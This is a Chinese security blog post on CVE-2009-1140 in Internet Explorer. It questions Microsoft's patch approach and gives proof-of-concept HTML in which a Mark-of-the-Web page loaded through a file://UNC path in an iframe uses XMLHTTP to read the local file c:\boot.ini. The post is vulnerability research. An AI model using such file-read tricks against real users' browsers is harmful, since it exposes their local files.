帮你从补丁角度看漏洞_安全预警_黑客防线网安服务器维护基地--Powered by WWW.RONGSEN.COM.CN

帮你从补丁角度看漏洞

作者:黑客防线网安网站维护基地 来源:黑客防线网安 浏览次数:0

本篇关键词:补丁安全提示
黑客防线网安网讯:从ms的对CVE-2009-1140的补丁方式和对80sec的漏洞报告致谢里来看,他们看CVE-2009-1140的角度是放在 object标签对非html文件的解析问题上:

从ms的对CVE-2009-1140的补丁方式和对80sec的漏洞报告致谢里来看他们看CVE-2009-1140的角度是放在 object标签对非html文件的解析问题上:

<object data="index.dat" type="text/html" width="100%" height="50"></object>

[从ms的角度看待这个漏洞那么这个漏洞也应该起码早在了10年前就补丁(MS00-055)....]

对于80sec报告的那个问题文件探测则是认为是:“该问题由于IE引用外源文件时错误处理不慎导致”的而且上面漏洞的关键的调用方式:file://uncpath 却不认为他是“漏洞”....


对于file://uncpath的方式算不算是“漏洞”,下面我们做个测试:

保存文件c:\test.htm:

<html>
<head>
<title>test.htm</title>
</head>
<body>
test.htm
</body>
</html>

保存文件c:\test1.htm:

<html>
<head>
<title>test1.htm</title>
<!-- saved from url=(0014)about:internet -->
</head>
<body>
test1.htm
</body>
</html>

保存文件c:\test2.htm:

<html>
<head>
<title>test2.htm</title>
<!-- saved from url=(0016)http://localhost -->
</head>
<body>
test2.htm
</body>
</html>

保存文件http://192.168.1.101/ie7/iframe.htm

<html>
<head>
<title>iframe.htm</title>
</head>
<body>
file:////127.0.0.1/c$/test.htm<br>
<iframe src="file:////127.0.0.1/c$/test.htm"></iframe>
<br>file://c:/test.htm<br>
<iframe src="file://c:/test.htm"></iframe>
<br>file://c:/test1.htm<br>
<iframe src="file://c:/test1.htm"></iframe>
<br>file://c:/test2.htm<br>
<iframe src="file://c:/test2.htm"></iframe>
</body>
</html>

我们先科普一下test1.htm里的“<!-- saved from url=(0014)about:internet -->”,详细:http://msdn.microsoft.com/ch/library/ms537628%28VS.85%29.aspx

The Mark of the Web (MOTW) is a feature of Windows Internet Explorer that enhances security by enabling Internet Explorer to force Web pages to run in the security zone of the location the page was saved from—as long as that security zone is more restrictive than the Local Machine zone—instead of the Local Machine zone. The role of the MOTW is more prominent with Microsoft Internet Explorer 6 for Windows XP Service Pack 2 (SP2) because of increased security restrictions in the Local Machine zone. When you are developing Web content, the MOTW enables you to test your active HTML documents in the security zone where you intend the pages to run. Adding the MOTW to your Web pages also enables you to fully test their compatibility with users' security settings.

这个是ie6 sp2引进的一个安全策略,可以设置本地html文件的所在的域,上面的test1.htm的域就指定为internet域
从上面的访问结果看到:file://c:/的方式可以访问到被标示为“Local Intranet Zone ”和“Intranet Zone”的文件test1.htm 和test2.htm ,而访问不到没有MOTW标示的test.htm. 而且file://unc的方式成功访问到了 。

如果只是访问到,你可能认为这个不会带来安全上的问题,那么我们继续测试下:

保存文件c:\xhr.htm:

<html>
<head>
<title>xhr.htm</title>
<!-- saved from url=(0014)about:internet -->
</head>
<body>
<script>
xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");
xmlhttp.open("GET","boot.ini",false);
xmlhttp.send();
document.write(xmlhttp.responseText);
</script>
</body>
</html>

保存文件http://192.168.1.101/ie7/iframe-1.htm:

<html>
<head>
<title>iframe-1.htm</title>
</head>
<body>
file:////127.0.0.1/c$/xhr.htm<br>
<iframe src="file:////127.0.0.1/c$/xhr.htm"></iframe>
<br>file://c:/xhr.htm<br>
<iframe src="file://c:/xhr.htm"></iframe>
</body>
</html>


结果很明显通过file://unc xmlhttp读取了c:\boot.ini,file://c:/则是拒绝访问。就上面的测试,如果按文章开头ms的处理方式,那应该算是xmlhttp的“漏洞”???

    黑客防线网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-4549-1.html
网站维护教程更新时间:2010-10-24 02:08:23  【打印此页】  【关闭
我要申请本站N点 | 黑客防线官网 |  
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479

footer  footer  footer  footer